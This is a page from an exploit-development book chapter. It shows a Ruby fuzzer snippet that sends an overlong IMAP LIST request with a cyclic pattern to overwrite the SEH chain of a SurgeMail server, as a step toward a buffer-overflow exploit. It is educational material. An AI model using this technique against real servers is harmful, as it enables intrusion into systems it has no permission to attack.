background image

202

Chapter 14

Figure 14-2: The overwritten SEH entry

Now that you know that you can control the SEH chain on the vulner-

able 

surgemail

 process with an overly long buffer, it’s time to determine the 

exact length required to overwrite it on the target. As you will recall from 
our discussions of stand-alone exploit development, before you can use a 
return address, you first need to find out where, exactly, the overwrite 
occurs.

We can modify our fuzzer code to create a nonrepeating, random string 

of characters of a specific length, as shown next:

print_status("Generating fuzzed data...")
  fuzzed = 

Rex::Text.pattern_create

(11000)

  print_status("Sending fuzzed data, buffer length = %d" % fuzzed.length)
  req = '0002 LIST () "/' + fuzzed + '" "PWNED"' + "\r\n"

In this listing, we use 

Rex::Text.pattern_create

 to generate the nonrepeat-

ing random string of characters with our fuzzer. Rerunning the fuzzer module 
now shows that SEH was overwritten on the target with 

684E3368

, as shown 

in Figure 14-3.

Figure 14-3: The SEH overwritten with random 
characters